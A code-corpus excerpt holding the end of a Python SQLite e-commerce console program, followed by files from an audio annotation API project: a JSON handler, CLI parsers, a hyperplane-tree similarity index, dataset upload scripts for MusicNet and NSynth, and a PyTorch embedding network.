sys.exit()
except FileNotFoundError:
print("file not existent closing in 5secs \nplease wait...")
time.sleep(5)
sys.exit()
except PermissionError:
print("file in use on your system process")
time.sleep(3)
sys.exit()
elif s_choice == "2":
wrd = input("Enter Product description: ")
word = wrd.strip()
conn = sqlite3.connect("ecom.db")
c = conn.cursor()
try:
c.execute("SELECT desc, price, tag FROM products WHERE desc LIKE ?", (['%'+word+'%']))
record = c.fetchall()
for row in record:
print(
'Product Description:- ', row[0], "\n"
'Price:- ', row[1], "\n"
'Category:- ', row[2], "\n"
)
conn.close()
else:
print("No more results/End of results \nplease wait...")
conn.close()
time.sleep(3)
except sqlite3.OperationalError as e:
print(e)
print("Database might be locked check and run again \nplease wait...")
sys.exit()
except sqlite3.IntegrityError as e:
print(e)
except FileNotFoundError:
print("file not existent closing in 5secs \nplease wait...")
time.sleep(5)
sys.exit()
except PermissionError:
print("file in use on your system process \nplease wait...")
time.sleep(3)
sys.exit()
elif s_choice == "3":
break
else:
print("You have to press 1 or 2 or 3")
def backup():
try:
conn = sqlite3.connect("ecom.db")
c = conn.cursor()
c.execute("SELECT * FROM user")
results = c.fetchall()
headers = [i[0] for i in c.description]
csvfile = csv.writer(open('backups/userbckup.csv', 'w', newline=''),
delimiter=',', lineterminator='\r\n',
quoting=csv.QUOTE_ALL, escapechar='\\')
csvfile.writerow(headers)
csvfile.writerows(results)
c.execute("SELECT * FROM products")
results = c.fetchall()
headers = [i[0] for i in c.description]
csvfile = csv.writer(open('backups/productbckup.csv', 'w', newline=''),
delimiter=',', lineterminator='\r\n',
quoting=csv.QUOTE_ALL, escapechar='\\')
csvfile.writerow(headers)
csvfile.writerows(results)
conn.close()
except sqlite3.DatabaseError as e:
print(e)
print("backup unsuccessful")
except PermissionError as w:
print(w)
print("backup unsuccessful")
print("Check if the file is already open")
def backup_cart():
try:
conn = sqlite3.connect("ecom.db")
c = conn.cursor()
c.execute("SELECT * FROM cart")
results = c.fetchall()
headers = [i[0] for i in c.description]
csvfile = csv.writer(open('backups/cartbckup.csv', 'w', newline=''),
delimiter=',', lineterminator='\r\n',
quoting=csv.QUOTE_ALL, escapechar='\\')
csvfile.writerow(headers)
csvfile.writerows(results)
conn.close()
except sqlite3.DatabaseError as e:
print(e)
print("backup unsuccessful")
except PermissionError as w:
print(w)
print("backup unsuccessful")
print("Check if the file is already open")
def update_prd(desc):
conn = sqlite3.connect("ecom.db")
c = conn.cursor()
try:
c.execute("SELECT * FROM products WHERE desc=?", [desc])
if c.fetchone():
print("Enter New Details Below: ")
des = input("Enter product description:-->")
prd = des.strip().capitalize()
price = check_amt(input("Enter product price:-->"))
cat = tag_check(remove(input("Enter product category tag:-->")))
tag = cat.upper()
qty = check_in(input("Enter product qty available:-->"))
c.execute("UPDATE products SET desc = ?, price = ?, tag = ?, qty = ? WHERE desc = ?", [prd, price, tag, qty, desc])
conn.commit()
conn.close()
print("Product: "+desc+"\nUpdate successfull \nplease wait...")
time.sleep(2)
else:
print("Product does not exist, verify or search before updating...")
time.sleep(2)
except sqlite3.OperationalError as e:
print(e)
print("Database might be locked check and run again \nplease wait...")
sys.exit()
except sqlite3.IntegrityError as e:
print(e)
except FileNotFoundError:
print("file not existent closing in 5secs \nplease wait...")
time.sleep(5)
sys.exit()
except PermissionError:
print("file in use on your system process \nplease wait...")
time.sleep(3)
sys.exit()
def del_prd(desc):
conn = sqlite3.connect("ecom.db")
c = conn.cursor()
try:
c.execute("SELECT * FROM products WHERE desc=?", [desc])
if c.fetchone():
c.execute("DELETE FROM products WHERE desc = ?", [desc])
conn.commit()
conn.close()
print("Product: " + desc + "\nDelete successfull \nplease wait...")
time.sleep(2)
else:
print("Product: " + desc + "\ndoes not exist, verify or search before deleting...")
time.sleep(2)
except sqlite3.OperationalError as e:
print(e)
print("Database might be locked check and run again \nplease wait...")
sys.exit()
except sqlite3.IntegrityError as e:
print(e)
except FileNotFoundError:
print("file not existent closing in 5secs \nplease wait...")
time.sleep(5)
sys.exit()
except PermissionError:
print("file in use on your system process \nplease wait...")
time.sleep(3)
sys.exit()
def ch_cart(desc, uname):
conn = sqlite3.connect("ecom.db")
c = conn.cursor()
try:
st = 'O'
c.execute("SELECT desc, price, qty FROM cart WHERE LOGIN = ? AND desc = ? AND status = ?", [uname, desc, st])
if c.fetchone():
c.execute("SELECT desc, price, qty FROM cart WHERE LOGIN = ? AND desc = ? AND status = ?", [uname, desc, st])
record = c.fetchall()
for row in record:
print(
'\nProduct Description:- ', row[0], "\n"
'Price:- ', row[1], "\n"
'Qty:- ', row[2], "\n"
'Total:- ', round((row[1]*row[2]), 2), "\n"
)
print("This product is already in added to cart.\nTo modify, please view your cart.")
time.sleep(2)
break
else:
buy_prd(desc, uname)
except sqlite3.OperationalError as e:
print(e)
print("Database might be locked check and run again \nplease wait...")
sys.exit()
except sqlite3.IntegrityError as e:
print(e)
except FileNotFoundError:
print("file not existent closing in 5secs \nplease wait...")
time.sleep(3)
sys.exit()
except PermissionError:
print("file in use on your system process \nplease wait...")
time.sleep(3)
sys.exit()
def buy_prd(desc, uname):
conn = sqlite3.connect("ecom.db")
c = conn.cursor()
try:
c.execute("SELECT desc, price, tag FROM products WHERE desc=?", [desc])
if c.fetchone():
dis_item(desc)
qty = check_in(input("Enter qty desired:-->"))
c.execute("SELECT desc, price, tag FROM products WHERE desc=? AND qty < ?", [desc, qty])
if c.fetchone():
print("Product out of stock\nplease try again later")
time.sleep(2)
else:
c.execute("SELECT price, tag FROM products WHERE desc=?", [desc])
rec = c.fetchone()
pr = rec[0]
tg = rec[1]
dt = datetime.datetime.now()
st = 'O'
c.execute("UPDATE products SET qty = qty - ? WHERE desc =?", [qty, desc])
c.execute("INSERT INTO cart(LOGIN, desc, price, tag, qty, status, date) VALUES (?, ?, ?, ?, ?, ?, ?)", [uname, desc, pr, tg, qty, st, dt])
conn.commit()
conn.close()
print("Product: " + desc + "\nAdded to Cart \nplease wait...")
time.sleep(2)
else:
print("Product does not exist, verify or search before buying...")
time.sleep(2)
except sqlite3.OperationalError as e:
print(e)
print("Database might be locked check and run again \nplease wait...")
sys.exit()
except sqlite3.IntegrityError as e:
print(e)
except FileNotFoundError:
print("file not existent closing in 5secs \nplease wait...")
time.sleep(3)
sys.exit()
except PermissionError:
print("file in use on your system process \nplease wait...")
time.sleep(3)
sys.exit()
def dis_item(desc):
conn = sqlite3.connect("ecom.db")
c = conn.cursor()
try:
c.execute("SELECT desc, price, tag FROM products WHERE desc=?", [desc])
record = c.fetchall()
for row in record:
print(
'\nProduct Description:- ', row[0], "\n"
'Price:- ', row[1], "\n"
)
except sqlite3.OperationalError as e:
print(e)
print("Database might be locked check and run again \nplease wait...")
sys.exit()
except sqlite3.IntegrityError as e:
print(e)
except FileNotFoundError:
print("file not existent closing in 5secs \nplease wait...")
time.sleep(3)
sys.exit()
except PermissionError:
print("file in use on your system process \nplease wait...")
time.sleep(3)
sys.exit()
def crt_updt(desc):
conn = sqlite3.connect("ecom.db")
c = conn.cursor()
so = 'O'
try:
c.execute("SELECT desc, price, qty FROM cart WHERE desc=? AND status = ?", [desc, so])
record = c.fetchall()
for row in record:
print(
'\nProduct Description:- ', row[0], "\n"
'Price:- ', row[1], "\n"
'Qty:- ', row[2], "\n"
)
except sqlite3.OperationalError as e:
print(e)
print("Database might be locked check and run again \nplease wait...")
sys.exit()
except sqlite3.IntegrityError as e:
print(e)
except FileNotFoundError:
print("file not existent closing in 5secs \nplease wait...")
time.sleep(3)
sys.exit()
except PermissionError:
print("file in use on your system process \nplease wait...")
time.sleep(3)
sys.exit()
def dis_cart(uname):
conn = sqlite3.connect("ecom.db")
c = conn.cursor()
try:
st = 'O'
c.execute("SELECT desc, price, qty FROM cart WHERE LOGIN = ? AND status = ?", [uname, st])
record = c.fetchall()
for row in record:
print(
'\nProduct Description:- ', row[0], "\n"
'Price:- ', row[1], "\n"
'Qty:- ', row[2], "\n"
'Total:- ', round((row[1]*row[2]), 2), "\n"
)
else:
c.execute("SELECT SUM(price*qty) FROM cart WHERE LOGIN = ? AND status = ?", [uname, st])
result = c.fetchone()
rslt =str(round(result[0], 2))
print("Cart Grand Total: " + rslt)
except sqlite3.OperationalError as e:
print(e)
print("Database might be locked check and run again \nplease wait...")
sys.exit()
except sqlite3.IntegrityError as e:
print(e)
except FileNotFoundError:
print("file not existent closing in 5secs \nplease wait...")
time.sleep(3)
sys.exit()
except PermissionError:
print("file in use on your system process \nplease wait...")
time.sleep(3)
sys.exit()
def a_orderhis():
conn = sqlite3.connect("ecom.db")
c = conn.cursor()
try:
st = 'C'
c.execute("SELECT LOGIN, desc, price, qty, strftime('%Y %m %d',date) FROM cart WHERE status = ? ORDER BY date DESC", [st])
record = c.fetchall()
for row in record:
print(
'\nUser:- ', row[0], "\n"
'Product Description:- ', row[1], "\n"
'Price:- ', row[2], "\n"
'Qty:- ', row[3], "\n"
'Total:- ', round((row[2]*row[3]), 2), "\n"
'Order Date:- ',row[4], "\n"
)
time.sleep(3)
except sqlite3.OperationalError as e:
print(e)
print("Database might be locked check and run again \nplease wait...")
sys.exit()
except sqlite3.IntegrityError as e:
print(e)
except FileNotFoundError:
print("file not existent closing in 5secs \nplease wait...")
time.sleep(3)
sys.exit()
except PermissionError:
print("file in use on your system process \nplease wait...")
time.sleep(3)
sys.exit()
def u_orderhis(uname):
conn = sqlite3.connect("ecom.db")
c = conn.cursor()
try:
st = 'C'
c.execute("SELECT desc, price, qty, strftime('%Y %m %d',date) FROM cart WHERE LOGIN = ? AND status = ? ORDER BY date DESC", [uname, st])
record = c.fetchall()
for row in record:
print(
'\nProduct Description:- ', row[0], "\n"
'Price:- ', row[1], "\n"
'Qty:- ', row[2], "\n"
'Total:- ', round((row[1]*row[2]), 2), "\n"
'Order Date:- ', row[3], "\n"
)
time.sleep(3)
except sqlite3.OperationalError as e:
print(e)
print("Database might be locked check and run again \nplease wait...")
sys.exit()
except sqlite3.IntegrityError as e:
print(e)
except FileNotFoundError:
print("file not existent closing in 5secs \nplease wait...")
time.sleep(3)
sys.exit()
except PermissionError:
print("file in use on your system process \nplease wait...")
time.sleep(3)
sys.exit()
def cart(uname):
conn = sqlite3.connect("ecom.db")
c = conn.cursor()
try:
st = 'O'
c.execute("SELECT desc, price, qty FROM cart WHERE LOGIN = ? AND status = ?", [uname, st])
if c.fetchall():
dis_cart(uname)
checkout(uname)
else:
print("Your cart is empty")
except sqlite3.OperationalError as e:
print(e)
print("Database might be locked check and run again \nplease wait...")
sys.exit()
except sqlite3.IntegrityError as e:
print(e)
except FileNotFoundError:
print("file not existent closing in 5secs \nplease wait...")
time.sleep(3)
sys.exit()
except PermissionError:
print("file in use on your system process \nplease wait...")
time.sleep(3)
sys.exit()
def checkout(uname):
while True:
print("""
1. Checkout
2. Modify Cart
3. Back
""")
ch = input("Enter Your Choice: ")
st = 'C'
so = 'O'
dt = datetime.datetime.now()
if ch == "1":
conn = sqlite3.connect("ecom.db")
c = conn.cursor()
try:
c.execute("UPDATE cart SET status = ?, date = ? WHERE LOGIN = ? and status = ?", [st, dt, uname, so])
conn.commit()
conn.close()
print("Checked out successfully \nplease wait...")
time.sleep(2)
break
except sqlite3.OperationalError as e:
print(e)
print("Database might be locked check and run again \nplease wait...")
sys.exit()
except sqlite3.IntegrityError as e:
print(e)
except FileNotFoundError:
print("file not existent closing in 5secs \nplease wait...")
time.sleep(5)
sys.exit()
except PermissionError:
print("file in use on your system process \nplease wait...")
time.sleep(3)
sys.exit()
elif ch == "2":
des = input("Enter product description from cart to modify:-->")
prd = des.strip().capitalize()
conn = sqlite3.connect("ecom.db")
c = conn.cursor()
try:
c.execute("SELECT * FROM cart WHERE desc=? AND status = ? AND LOGIN = ?", [prd, so, uname])
if c.fetchone():
crt_updt(prd)
qty = check_in(input("Enter New qty:-->"))
if qty == '0':
c.execute("DELETE FROM cart WHERE desc=? AND status = ? AND LOGIN = ?", [prd, so, uname])
conn.commit()
conn.close()
print("Product: " + prd + "\nRemoved successfully \nplease wait...")
time.sleep(2)
cart(uname)
else:
c.execute("UPDATE cart SET qty = ? WHERE desc=? AND status = ? AND LOGIN = ?", [qty, prd, so, uname])
conn.commit()
conn.close()
print("Product: " + prd + "\nUpdate successfull \nplease wait...")
time.sleep(2)
cart(uname)
else:
print("this item is not in your cart please verify again")
except sqlite3.OperationalError as e:
print(e)
print("Database might be locked check and run again \nplease wait...")
sys.exit()
except sqlite3.IntegrityError as e:
print(e)
except FileNotFoundError:
print("file not existent closing in 5secs \nplease wait...")
time.sleep(3)
sys.exit()
except PermissionError:
print("file in use on your system process \nplease wait...")
time.sleep(3)
sys.exit()
elif ch == "3":
break
else:
print("You have to press 1 or 2 or 3")
``` |
{
"source": "JohnVinyard/annotate-api",
"score": 3
} |
#### File: annotate-api/app/customjson.py
```python
import json
import datetime
from falcon.media import BaseHandler
from enum import Enum
class JsonEncoder(json.JSONEncoder):
def __init__(self, convert_to_links):
super().__init__()
self.convert_to_links = convert_to_links
def default(self, o):
try:
return self.convert_to_links.convert_to_link(o)
except KeyError:
pass
if isinstance(o, datetime.datetime):
return o.isoformat() + 'Z'
elif isinstance(o, Enum):
return o.value
else:
return super().default(o)
class JSONHandler(BaseHandler):
def __init__(self, convert_to_links):
super().__init__()
self.encoder = JsonEncoder(convert_to_links)
def deserialize(self, raw, content_type, content_length):
return json.loads(raw.decode())
def serialize(self, obj, content_type):
return self.encoder.encode(obj).encode()
__all__ = [
JSONHandler
]
```
#### File: annotate-api/examples/cli.py
```python
import argparse
class DefaultArgumentParser(argparse.ArgumentParser):
def __init__(self):
super().__init__(add_help=False)
self.add_argument(
'--password',
required=True,
help='user password')
self.add_argument(
'--annotate-api-endpoint',
required=True,
help='scheme, hostname and optional port for annotation API')
self.add_argument(
'--s3-endpoint',
required=False,
help='scheme, hostname and optional port of s3 endpoint')
self.add_argument(
'--s3-region',
required=False,
default=None)
self.add_argument(
'--aws-access-key-id',
required=False,
default=None)
self.add_argument(
'--aws-secret-access-key',
required=False,
default=None)
class DatasetArgumentParser(DefaultArgumentParser):
def __init__(self):
super().__init__()
self.add_argument(
'--metadata-path',
required=True,
help='path to dataset on disk')
```
#### File: annotate-api/examples/hyperplane_tree.py
```python
from scipy.spatial.distance import cdist
import heapq
import numpy as np
import random
from hashlib import sha1
from itertools import zip_longest
def batch_unit_norm(b, epsilon=1e-8):
"""
Give all vectors unit norm along the last dimension
"""
return b / np.linalg.norm(b, axis=-1, keepdims=True) + epsilon
def unit_vectors(n_examples, n_dims):
"""
Create n_examples of synthetic data on the unit
sphere in n_dims
"""
dense = np.random.normal(0, 1, (n_examples, n_dims))
return batch_unit_norm(dense)
def hyperplanes(n_planes, n_dims):
"""
Return n_planes plane vectors, which describe
hyperplanes in n_dims space that are perpendicular
to lines running from the origin to each point
"""
return unit_vectors(n_planes, n_dims)
def random_projection(plane_vectors, data, pack=True, binarize=True):
"""
Return bit strings for a batch of vectors, with each
bit representing which side of each hyperplane the point
falls on
"""
flattened = data.reshape((len(data), plane_vectors.shape[-1]))
x = np.dot(plane_vectors, flattened.T).T
if not binarize:
return x
output = np.zeros((len(data), len(plane_vectors)), dtype=np.uint8)
output[np.where(x > 0)] = 1
if pack:
output = np.packbits(output, axis=-1).view(np.uint64)
return output
def traversal(roots, pop_from=0):
build_queue = list(roots)
while build_queue:
next_node = build_queue.pop(pop_from)
yield build_queue, next_node
class HyperPlaneNode(object):
def __init__(self, shape, data=None, plane=None):
super(HyperPlaneNode, self).__init__()
self.dimensions = shape
# choose one plane, at random, for this node
if plane is None:
self.plane = hyperplanes(1, shape)
else:
self.plane = plane
self.data = \
data if data is not None else np.zeros((0,), dtype=np.uint64)
self.left = None
self.right = None
def __hash__(self):
return hash(sha1(self.plane).hexdigest())
def traverse(self):
for queue, node in traversal([self], pop_from=0):
yield node
if node.left:
queue.append(node.left)
if node.right:
queue.append(node.right)
def __eq__(self, other):
st = self.traverse()
try:
ot = other.traverse()
except AttributeError:
return False
for a, b in zip_longest(st, ot):
if np.any(a.data != b.data):
return False
if np.any(a.plane != b.plane):
return False
return True
def __len__(self):
return len(self.data)
def __repr__(self):
return f'Node(hash={hash(self)})'
def __str__(self):
return self.__repr__()
@property
def is_leaf(self):
return self.left is None and self.right is None
@property
def children(self):
return self.left, self.right
def distance(self, query):
dist = random_projection(
self.plane, query, pack=False, binarize=False).reshape(-1)
return dist
def route(self, data, indices=None):
if indices is None:
indices = self.data
data = data[indices]
dist = self.distance(data)
left_indices = indices[dist > 0]
right_indices = indices[dist <= 0]
return left_indices, right_indices
def create_children(self, data):
left_indices, right_indices = self.route(data)
self.left = HyperPlaneNode(self.dimensions, left_indices)
self.right = HyperPlaneNode(self.dimensions, right_indices)
class MultiHyperPlaneTree(object):
def __init__(self, data, smallest_node, n_trees=10):
super(MultiHyperPlaneTree, self).__init__()
self.data = data
indices = np.arange(0, len(data), dtype=np.uint64)
self.smallest_node = smallest_node
self.roots = \
[HyperPlaneNode(self.dimensions, indices) for _ in range(n_trees)]
build_queue = list(self.roots)
while build_queue:
node = build_queue.pop()
if len(node) <= smallest_node:
continue
else:
node.create_children(self.data)
build_queue.extend(node.children)
@property
def dimensions(self):
return self.data.shape[1]
def check(self):
output = []
for queue, node in traversal(list(self.roots), pop_from=0):
output.append(str(node))
if node.left:
queue.append(node.left)
if node.right:
queue.append(node.right)
return output
def __setstate__(self, state):
def build_node(_, plane, data):
return HyperPlaneNode(state['shape'], data, plane)
roots = [build_node(*data) for data in state['roots']]
self.roots = roots
self.data = state['data']
self.smallest_node = state['smallest_node']
graph = state['graph']
for queue, next_node in traversal(roots, pop_from=0):
left, right = graph[hash(next_node)]
if left:
left = build_node(*left)
next_node.left = left
queue.append(left)
if right:
right = build_node(*right)
next_node.right = right
queue.append(right)
def __getstate__(self):
def node_state(node):
return hash(node), node.plane, node.data
graph = dict()
for queue, next_node in traversal(list(self.roots), pop_from=0):
item = []
left = next_node.left
right = next_node.right
if left:
queue.append(left)
item.append(node_state(left))
else:
item.append(None)
if right:
queue.append(right)
item.append(node_state(right))
else:
item.append(None)
graph[hash(next_node)] = item
roots = [node_state(r) for r in self.roots]
return {
'shape': self.roots[0].dimensions,
'roots': roots,
'graph': graph,
'smallest_node': self.smallest_node,
'n_trees': len(roots),
'data': self.data
}
def __eq__(self, other):
return all(s == r for (s, r) in zip(self.roots, other.roots))
def __len__(self):
return len(self.data)
def append(self, chunk):
# compute the new set of indices that need to be added to the tree
new_indices = np.arange(0, len(chunk), dtype=np.uint64) + len(self.data)
# ensure that the chunk of vectors are added to the available vector
# data
self.data = np.concatenate([self.data, chunk])
# initialize the search queue with all root nodes
search_queue = list([(r, new_indices) for r in self.roots])
while search_queue:
# add the indices to the node's data
node, indices = search_queue.pop()
node.data = np.concatenate([node.data, indices])
if len(node) <= self.smallest_node:
# this will be a leaf node. There's no need to further route
# the data or add further child nodes (for now)
continue
if node.is_leaf:
# we'll be creating new child nodes. At this point, we need
# to route *all* of the data currently owned by this node
node.create_children(self.data)
else:
# this node already has children, so it's only necessary to
# route new indices
left_indices, right_indices = node.route(self.data, indices)
search_queue.append((node.left, left_indices))
search_queue.append((node.right, right_indices))
def search_with_priority_queue(
self,
query,
n_results,
threshold,
return_distances=False,
return_vectors=False):
query = query.reshape(1, self.dimensions)
indices = set()
# this is kinda arbitrary.
# How do I pick this intelligently?
to_consider = n_results * 100
# put the root nodes in the queue
# KLUDGE: Assign arbitrary values to each root node, taking on values
# larger than the greatest possible cosine distance to ensure that
# each root node is processed first
# KLUDGE: Add a random number in the second position to ensure that
# hyperplane nodes are never compared in the event of identical
# distances
heap = [
(-((i + 1) * 10), random.random(), root)
for i, root in enumerate(self.roots)
]
# traverse the tree, finding candidate indices
while heap and (len(indices) < to_consider):
current_distance, _, current_node = heapq.heappop(heap)
if current_node.is_leaf:
indices.update(current_node.data)
continue
dist = current_node.distance(query)
abs_dist = np.abs(dist)
below_threshold = abs_dist < threshold
# KLUDGE: Add a random number in the second position to ensure that
# hyperplane nodes are never compared in the event of identical
# distances
if dist > 0 or below_threshold:
heapq.heappush(
heap, (-abs_dist, random.random(), current_node.left))
if dist <= 0 or below_threshold:
heapq.heappush(
heap, (-abs_dist, random.random(), current_node.right))
# perform a brute-force distance search over a subset of the data
indices = np.array(list(indices), dtype=np.uint64)
data = self.data[indices]
dist = cdist(query, data, metric='cosine').squeeze()
partitioned_indices = np.argpartition(dist, n_results)[:n_results]
sorted_indices = np.argsort(dist[partitioned_indices])
srt_indices = partitioned_indices[sorted_indices]
final_indices = indices[srt_indices]
if return_vectors:
return final_indices, self.data[final_indices]
elif return_distances:
return final_indices, dist[sorted_indices]
else:
return final_indices
```
#### File: annotate-api/examples/musicnet_dataset.py
```python
from http import client
from cli import DatasetArgumentParser
from client import Client
import argparse
import os
from csv import DictReader
from zounds.util import midi_to_note, midi_instrument
from s3client import ObjectStorageClient
import soundfile
from log import module_logger
from mp3encoder import encode_mp3
logger = module_logger(__file__)
def slugify(s):
return s.lower().replace('(', '').replace(')', '').replace(' ', '-')
def get_metadata(path):
metadata = dict()
metadata_file = os.path.join(path, 'musicnet_metadata.csv')
with open(metadata_file, 'r') as f:
reader = DictReader(f)
for row in reader:
composer = slugify(row['composer'])
ensemble = slugify(row['ensemble'])
data = {
'tags': [composer, ensemble],
'title': f'{row["composition"]} {row["movement"]}'
}
metadata[row['id']] = data
return metadata
def get_annotations(filename, samplerate):
with open(filename, 'r') as f:
reader = DictReader(f)
for row in reader:
start_seconds = int(row['start_time']) / samplerate
stop_seconds = int(row['end_time']) / samplerate
duration_seconds = stop_seconds - start_seconds
note = midi_to_note(int(row['note']))
instrument = slugify(midi_instrument(int(row['instrument'])))
yield {
'start_seconds': start_seconds,
'duration_seconds': duration_seconds,
'tags': [
f'musical_note:{note}',
instrument,
]
}
def add_sounds(data_dir, labels_dir, metadata, tags):
for audio_filename in os.listdir(data_dir):
_id = os.path.splitext(audio_filename)[0]
data = metadata[_id]
audio_path = os.path.join(data_dir, audio_filename)
labels_path = os.path.join(labels_dir, f'{_id}.csv')
# push audio data to s3
with open(audio_path, 'rb') as f:
url = object_storage_client.put_object(_id, f, 'audio/wav')
logger.info(f'pushed {url} to s3')
with open(audio_path, 'rb') as f:
encoded = encode_mp3(f)
low_quality_id = os.path.join('low-quality', _id)
low_quality_url = object_storage_client.put_object(
low_quality_id, encoded, 'audio/mp3')
logger.info(f'pushed {low_quality_url} to s3')
# create a sound
info = soundfile.info(audio_path)
status, sound_uri, sound_id = annotate_client.create_sound(
audio_url=url,
low_quality_audio_url=low_quality_url,
info_url=info_url,
license_type='https://creativecommons.org/licenses/by/4.0',
title=data['title'],
duration_seconds=info.duration,
tags=tags)
if status == client.CREATED:
# create a full-length annotation with composer and ensemble tags
annotate_client.create_annotations(
sound_id,
{
'start_seconds': 0,
'duration_seconds': info.duration,
'tags': data['tags']
})
annotations = get_annotations(labels_path, info.samplerate)
# create annotations for all notes
annotate_client.create_annotations(sound_id, *annotations)
elif status == client.CONFLICT:
pass
else:
raise RuntimeError(f'Unexpected {status} encountered')
if __name__ == '__main__':
parser = argparse.ArgumentParser(parents=[
DatasetArgumentParser()
])
parser.add_argument(
'--train-only',
action='store_true',
default=False)
args = parser.parse_args()
annotate_client = Client(args.annotate_api_endpoint, logger=logger)
bucket_name = 'music-net'
info_url = 'https://homes.cs.washington.edu/~thickstn/musicnet.html'
object_storage_client = ObjectStorageClient(
endpoint=args.s3_endpoint,
region=args.s3_region,
access_key=args.aws_access_key_id,
secret=args.aws_secret_access_key,
bucket=bucket_name)
object_storage_client.ensure_bucket_exists()
with open('musicnet.md', 'r') as f:
about_me = f.read()
annotate_client.upsert_dataset(
user_name='musicnet',
email='<EMAIL>',
password=<PASSWORD>,
about_me=about_me,
info_url=info_url)
metadata = get_metadata(args.metadata_path)
if not args.train_only:
add_sounds(
os.path.join(args.metadata_path, 'test_data'),
os.path.join(args.metadata_path, 'test_labels'),
metadata,
['test'])
add_sounds(
os.path.join(args.metadata_path, 'train_data'),
os.path.join(args.metadata_path, 'train_labels'),
metadata,
['train'])
```
#### File: annotate-api/examples/nsynth_dataset.py
```python
import json
import argparse
from zounds.util import midi_to_note
import os
import soundfile
from client import Client
from cli import DatasetArgumentParser
from http import client
from s3client import ObjectStorageClient
from log import module_logger
from mp3encoder import encode_mp3
logger = module_logger(__file__)
def get_metadata(json_path):
with open(json_path, 'r') as f:
data = json.load(f)
processed = {}
for key, meta in data.items():
tags = meta['qualities_str']
tags.append(meta['instrument_family_str'])
tags.append(meta['instrument_source_str'])
tags.append('musical_note:' + midi_to_note(meta['pitch']))
tags.append('midi_velocity:' + str(meta['velocity']))
processed[key] = tags
return processed
if __name__ == '__main__':
parser = argparse.ArgumentParser(parents=[
DatasetArgumentParser()
])
args = parser.parse_args()
annotate_client = Client(args.annotate_api_endpoint, logger=logger)
with open('nsynth.md', 'r') as f:
about_me = f.read()
info_url = 'https://magenta.tensorflow.org/datasets/nsynth'
annotate_client.upsert_dataset(
user_name='nsynth',
email='<EMAIL>',
password=args.password,
about_me=about_me,
info_url=info_url)
metadata = get_metadata(os.path.join(args.metadata_path, 'examples.json'))
bucket_name = 'nsynth'
object_storage_client = ObjectStorageClient(
endpoint=args.s3_endpoint,
region=args.s3_region,
access_key=args.aws_access_key_id,
secret=args.aws_secret_access_key,
bucket=bucket_name)
audio_path = os.path.join(args.metadata_path, 'audio')
object_storage_client.ensure_bucket_exists()
for filename in os.listdir(audio_path):
full_path = os.path.join(audio_path, filename)
key, _ = os.path.splitext(filename)
# push the audio data to s3
with open(full_path, 'rb') as f:
url = object_storage_client.put_object(key, f, 'audio/wav')
logger.info(f'Created s3 resource at {url}')
with open(full_path, 'rb') as f:
encoded = encode_mp3(f)
low_quality_key = os.path.join('low-quality', key)
low_quality_url = object_storage_client.put_object(
low_quality_key, encoded, 'audio/mp3')
logger.info(f'pushed {low_quality_url} to s3')
duration_seconds = soundfile.info(full_path).duration
status, sound_uri, sound_id = annotate_client.create_sound(
audio_url=url,
low_quality_audio_url=low_quality_url,
info_url='https://magenta.tensorflow.org/datasets/nsynth',
license_type='https://creativecommons.org/licenses/by/4.0',
title=key,
duration_seconds=duration_seconds,
# TODO: There is overlap between train and validation sets, so
# tags for all sounds need to be established up front, before
# records are created, as they are immutable
tags=['validation'])
if status == client.CREATED:
# If we've just created the sound resource, create the annotation
# as well
annotate_client.create_annotations(
sound_id,
{
'start_seconds': 0,
'duration_seconds': duration_seconds,
'tags': metadata[key]
})
logger.info(f'Sound and annotation for {sound_id} created')
elif status == client.CONFLICT:
logger.info('Sound and annotation already created')
else:
raise RuntimeError(f'Unexpected {resp.status_code} encountered')
```
#### File: annotate-api/examples/spatial_network.py
```python
import numpy as np
from torch import nn
import torch
from torch.nn import functional as F
from torch.nn.init import xavier_normal_, calculate_gain
from zounds.learn.util import \
batchwise_unit_norm, batchwise_mean_std_normalization
import zounds
class EmbeddingNetwork(nn.Module):
"""
Compute Log-scaled mel spectrogram, followed by a vanilla 2d convolutional
network with alternating convolutional and max pooling layers
"""
def __init__(self):
super(EmbeddingNetwork, self).__init__()
frequency_channels = 128
channels = frequency_channels
sr = zounds.SR11025()
interval = zounds.FrequencyBand.audible_range(sr)
scale = zounds.MelScale(interval, frequency_channels)
self.bank = zounds.learn.FilterBank(
samplerate=sr,
kernel_size=512,
scale=scale,
scaling_factors=np.linspace(0.1, 1.0, len(scale)),
normalize_filters=True,
a_weighting=True)
self.main = nn.Sequential(
nn.Conv2d(1, channels, (13, 3), padding=(7, 1), bias=False),
nn.MaxPool2d((2, 2), (2, 2), padding=(1, 1)),
nn.Conv2d(channels, channels, (13, 3), padding=(7, 1), bias=False),
nn.MaxPool2d((2, 2), (2, 2), padding=(1, 1)),
nn.Conv2d(channels, channels, (13, 3), padding=(7, 1), bias=False),
nn.MaxPool2d((2, 2), (2, 2), padding=(1, 1)),
nn.Conv2d(channels, channels, (13, 3), padding=(7, 1), bias=False),
nn.MaxPool2d((2, 2), (2, 2), padding=(1, 1)),
)
self.final = nn.Sequential(
nn.Linear(128, 64, bias=False),
nn.Linear(64, 32, bias=False),
nn.Linear(32, 16, bias=False),
nn.Linear(16, 8, bias=False),
)
self.linear = nn.Linear(8, 3, bias=False)
@classmethod
def load_network(cls, weights_file_path):
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
network = cls().to(device)
try:
# load network weights from a file on disk
state_dict = torch.load(weights_file_path)
network.load_state_dict(state_dict)
except IOError:
# There were no weights stored on disk. Initialize them
network.initialize_weights()
return network, device
def trainable_parameter_count(self):
model_parameters = filter(lambda p: p.requires_grad, self.parameters())
return sum([np.prod(p.size()) for p in model_parameters])
def to(self, *args, **kwargs):
self.bank = self.bank.to(*args, **kwargs)
return super(EmbeddingNetwork, self).to(*args, **kwargs)
def initialize_weights(self):
for m in self.main.parameters():
if m.data.dim() > 2:
xavier_normal_(m.data, calculate_gain('leaky_relu', 0.2))
for m in self.final.parameters():
if m.data.dim() > 2:
xavier_normal_(m.data, calculate_gain('leaky_relu', 0.2))
for m in self.linear.parameters():
if m.data.dim() > 2:
xavier_normal_(m.data, 1)
def forward(self, x):
# normalize
x = batchwise_mean_std_normalization(x)
# filter bank
x = self.bank(x, normalize=False)
# temporal pooling
x = F.avg_pool1d(x, 128, 64, padding=64)
# give zero mean and unit variance
x = zounds.learn.batchwise_mean_std_normalization(x)
# view as 2d spectrogram "image", so dimension are now
# (batch, 1, 128, 128)
x = x[:, None, ...]
for m in self.main:
x = m(x)
x = F.leaky_relu(x, 0.2)
# global max pooling
x = F.max_pool2d(x, x.shape[2:])
# linear transformation
x = x.view(-1, self.linear.in_features)
x = x.view(-1, self.final[0].in_features)
